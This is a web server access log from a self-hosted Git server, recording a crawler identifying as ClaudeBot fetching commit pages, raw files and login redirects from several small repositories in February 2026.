git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Finclude%2Fsite%2Fpython3.12%2Fgreenlet" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 216.73.216.188] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" [Client 216.73.216.188] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 216.73.216.188] [Length 16056] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 11762] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 23784] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js?display=rendered" [Client 216.73.216.188] [Length 10955] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 216.73.216.188] [Length 12530] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2FREADME.md" [Client 216.73.216.188] [Length 23588] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 22989] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 11067] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 216.73.216.188] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html?display=rendered" [Client 216.73.216.188] [Length 10938] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" [Client 216.73.216.188] [Length 10641] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 11960] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/types.ts" [Client 216.73.216.188] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 10834] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/types.ts" [Client 216.73.216.188] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services" [Client 216.73.216.188] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10882] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 216.73.216.188] [Length 10853] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 216.73.216.188] [Length 9884] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 216.73.216.188] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" [Client 216.73.216.188] [Length 10267] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/README.md?display=source" [Client 216.73.216.188] [Length 12008] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 216.73.216.188] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15951] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 216.73.216.188] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore?display=source" [Client 216.73.216.188] [Length 11126] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Findex.html" [Client 216.73.216.188] [Length 36399] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 13739] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 11747] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 216.73.216.188] [Length 16066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 216.73.216.188] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FProgram.cs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2Findex.html" [Client 216.73.216.188] [Length 61238] [Gzip 9.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 27728] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/index.html" [Client 216.73.216.188] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 216.73.216.188] [Length 10931] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.vscode%2Flaunch.json" [Client 216.73.216.188] [Length 21943] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/index.tsx" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 216.73.216.188] [Length 11456] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/status.json" [Client 216.73.216.188] [Length 9791] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/status.json" [Client 216.73.216.188] [Length 824] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Ftypes.ts" [Client 216.73.216.188] [Length 23304] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 12603] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 216.73.216.188] [Length 6870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 12127] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 216.73.216.188] [Length 13001] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 216.73.216.188] [Length 6358] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 216.73.216.188] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 25071] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css?display=rendered" [Client 216.73.216.188] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf?display=source" [Client 216.73.216.188] [Length 11954] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 14323] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=source" [Client 216.73.216.188] [Length 13177] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FDebug%2Fnet8.0" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 46088] [Gzip 8.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9781] [Gzip 2.88] 